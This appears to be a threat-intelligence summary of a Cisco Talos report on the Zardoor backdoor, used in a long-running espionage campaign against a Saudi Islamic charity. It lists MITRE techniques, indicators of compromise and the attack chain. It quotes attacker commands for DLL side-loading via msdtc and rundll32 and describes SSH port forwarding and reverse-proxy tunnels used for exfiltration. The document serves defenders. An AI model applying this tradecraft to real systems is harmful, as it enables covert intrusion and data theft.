New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Cisco Talos uncovered a long-running espionage campaign targeting an Islamic charitable organization that uses a previously undocumented backdoor family named Zardoor and open-source reverse-proxy tools to maintain stealthy C2 and exfiltration. The attack chain uses DLL side-loading via msdtc.exe, scheduled-task persistence for proxy clients, and SSH/FRP/Venom-based reverse tunnels. #Zardoor #FastReverseProxy

Keypoints

Cisco Talos identified a persistent espionage campaign (since at least March 2021) targeting an Islamic non-profit in Saudi Arabia that exfiltrated data roughly twice monthly.
The adversary deployed a custom backdoor family named Zardoor (zar32.dll and zor32.dll) delivered via a malicious oci.dll loader and MSDTC side-loading.
Attackers used and modified open-source reverse-proxy tools (FRP, sSocks, Venom) — including removing VC runtime dependencies — to create persistent reverse tunnels and SOCKS/HTTPS proxies for C2 and exfiltration.
Persistence mechanisms included DLL side-loading via msdtc.exe, scheduled tasks (registered under names like legitimate security tasks) to run proxy clients every ~20 minutes, and retries/loops to ensure MSDTC service registration.
Zar32 provides encrypted C2 over HTTPS/SOCKS, remote PE execution in memory, remote shellcode execution, and dynamic updating of C2 IP/host/port; zor32 handles service installation, mutex checks, and relaunch attempts to maintain presence.
Movement and tool deployment used living-off-the-land binaries (WMI, rundll32, msdtc.exe, taskkill, netstat) to execute payloads, perform lateral actions, and evade detection.
Operators stored SSH private keys on victims and configured remote port forwarding (SSH tunneling) to expose internal services externally, enabling ongoing access and data exfiltration.

MITRE Techniques

[T1090.003] Proxy: Multi-hop Proxy – Reverse proxy tools (FRP, Venom, sSocks) were used to create tunnels and multi-hop proxies for remote access and exfiltration (‘Reverse proxies allow a computer connected to the internet to create a tunnel’).
[T1105] Ingress Tool Transfer – Dropper installs and executes the malicious oci.dll which contains embedded payloads (zar32.dll, zor32.dll) (‘The dropper drops a different version of oci.dll based on the OS bitness’).
[T1018] Remote System Discovery – The actor performed discovery of remote systems to support lateral movement and target selection (‘Remote System Discovery’).
[T1033] System Owner/User – The campaign collected system owner/user context as part of discovery (‘System Owner/User’).
[T1049] System Network Connections Discovery – The actor examined network connections and used netstat to validate SSH forwarding and connections (‘netstat -ano | findstr 70.34’).
[T1057] Process Discovery – Process listing and task management utilities were used to find and terminate processes (e.g., taskkill to kill ssh/shd processes) (‘taskkill’).
[T1087.002] Account Discovery: Domain Account – Account discovery techniques were employed to enumerate domain accounts (‘Account Discovery: Domain Account’).
[T1053.005] Scheduled Task/Job: Scheduled Task – Reverse proxies were registered as scheduled tasks (replacing legitimate task names) to run periodically (~20 minutes) for persistence (‘registers their reverse proxies as scheduled tasks’).
[T1574.002] Hijack Execution Flow: DLL Side-Loading – The dropper used msdtc.exe to register and load a malicious oci.dll which side-loaded zar32.dll/zor32.dll (‘side-loading backdoors contained in “oci.dll” via MSDTC’).
[T1047] Windows Management Instrumentation – WMI was used for lateral movement and remote process spawning to deploy tools like Zardoor (‘used Windows Management Instrumentation (WMI) to move laterally’).
[T1059.003] Command and Scripting Interpreter: Windows Command Shell – The actor executed commands and launched DLL exports via rundll32.exe and command-line utilities (‘rundll32.exe %TEMP%win_oci_41aa0d5.dll MainEntry’).
[T1204.002] User Execution: Malicious File – The initial dropper and delivered DLLs were executed on victim systems to establish the backdoor (‘The dropper installs and executes the malicious “oci.dll”’).
[T1055] Process Injection – The malware supports remote shellcode execution and in-memory PE execution capabilities, indicative of process injection techniques (‘Remote shellcode execution’).
[T1055.001] Process Injection: Dynamic-link Library Injection – DLL loading and in-memory execution via rundll32 and side-loaded DLLs were used to execute code (‘rundll32.exe C:WINDOWSsystem32zar32.dll MainEntry’).
[T1070.004] File Deletion – The dropper creates and uses batch cleanup scripts to remove the dropper and delete traces (‘The batch script deletes the dropper and then deletes itself.’).
[T1048] Exfiltration Over Alternative Protocol – Data exfiltration relied on tunnels and proxy channels (FRP/SSH/HTTP-over-proxy) rather than standard channels (‘exfiltrates data approximately twice a month’ and ‘remote port forwarding’).

Indicators of Compromise

[File names] persistence & payloads – zar32.dll, zor32.dll, and other related files (oci.dll, win_oci_41aa0d5.dll, xz330ksdfg.bat, msbuildss.exe, id_rsa).
[IP addresses] C2 and remote servers – 1.0.0[.]1, 70[.]34[.]208[.]197 (used in connection checks and SSH forwarding), and 1.0.0[.]2 / 1.0.0[.]3 referenced for C2.

<li([URLs/Endpoints]) C2 endpoints – 1.0.0[.]1/index.html, 1.0.0[.]2/index.html (used by zar32.dll to establish C2 over HTTPS/Cloudflare-associated IPs).

[Scheduled task names] persistence artifacts – “KasperskySecurity”, “Microsoft Security Essentialss” (legitimate task names observed replaced by attacker-created tasks running msbuildss.exe).
[Mutexes] runtime indicators – 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, 6c2711b5-e736-4397-a883-0d181a3f85ae (used by zar32/zor32 to detect running instances and prevent duplicates).
[SSH artifacts] remote access keys – c:users[redacted].sshid_rsa and known_hosts (private key and known_hosts files stored to enable SSH remote port forwarding).
[User-Agent strings] C2 traffic fingerprinting – example UA for 64-bit: “Mozilla/5.0 (Windows NT .; Trident/7.0; rv:11.0) like Gecko”, and WOW64 variant including “WOW64”.

The attack chain begins with a dropper that places a bitness-appropriate oci.dll into the system and attempts to register it with MSDTC via “msdtc -install”. If MSDTC cannot be stopped, the dropper patches oci.dll, writes it to %TEMP% (e.g., win_oci_41aa0d5.dll), and executes it with rundll32 to extract zar32.dll and zor32.dll. The embedded DLLs are dropped into System32, %userprofile%, or %TEMP% depending on markers (‘1ISSYSTEM’ / ‘1ISAUTORUN’), then launched via rundll32 (e.g., rundll32.exe C:WINDOWSsystem32zar32.dll MainEntry), enabling DLL side-loading persistence and execution.

Zar32 implements an HTTP/SSL RAT with encrypted C2, in-memory PE execution, remote shellcode execution, session ID search, and dynamic C2 reconfiguration. It connects to attacker-controlled endpoints (e.g., 1.0.0[.]1/index.html) over SSL using browser-like User-Agent strings and supports commands to exfiltrate data, run payloads, execute shellcode, and update C2 settings. Zor32 complements this by ensuring service installation (msdtc.exe), creating mutexes to detect running instances, and retrying up to 10 times to install/start MSDTC to maintain persistence and re-launch zar32 when needed.

For covert C2 and exfiltration, operators deployed and customized open-source reverse-proxy tools (FRP, sSocks, Venom), removed VC runtime dependencies from sSocks, and registered proxy clients as scheduled tasks (replacing tasks named like “KasperskySecurity”) to run every ~20 minutes. They also staged SSH keys (c:users….sshid_rsa and known_hosts) and used scripts (e.g., 2.vbs, shd.exe) to establish remote port forwarding (port 443 → 22) and validate tunnels via netstat, enabling remote access to internal services and regular data exfiltration.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print